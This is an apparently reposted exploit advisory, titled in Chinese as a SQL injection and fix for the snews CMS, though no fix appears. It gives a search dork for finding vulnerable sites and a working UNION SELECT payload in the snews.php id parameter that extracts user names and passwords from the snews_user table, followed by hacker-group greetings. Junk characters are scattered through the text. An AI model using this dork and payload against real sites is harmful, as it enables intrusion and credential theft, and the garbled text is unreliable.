CMS snews SQL注射及修复

admin

标题: CMS snews SQL Injection Vulnerability
: L$ b# B. B/ B1 M# U8 Q' R# Y/ V作者: By onestree
下载地址 : http://snewscms.com/
测试平台 : ubuntu 12.10 / win 7
关键词: inurl:"tanyakan pada rumput yang bergoyang"
! L5 y9 J2 p0 ^0 Q& D6 k% ~
8 W, w9 x' t7 L; D( R
*************************************************************
& L6 R+ m* g/ N
4 f2 [' t: q4 t+ I4 `) o" |SQL poc:
$ `, Q9 }3 x& m0 I6 q4 f
3 g( z" a  H: r  _http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

示例
  |. P+ p7 L, B9 v3 f! R* v
2 g! M/ P9 F; g% X6 ]7 Z( Q1 Ahttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
" V( E/ `2 ?" V( O3 D) S8 C( B7 z
, f" x$ P& G2 ^# }$ D
致谢:
' l% g' m2 g: y  _* y9 B5 Y0 z$ t# s
- \' e* L7 ^6 `/ H2 ]% Z# P9 V  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
& x" o% ], U9 R8 ?     
  D) K/ \* b* c& w/ S: _( t8 i/ V! h          indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*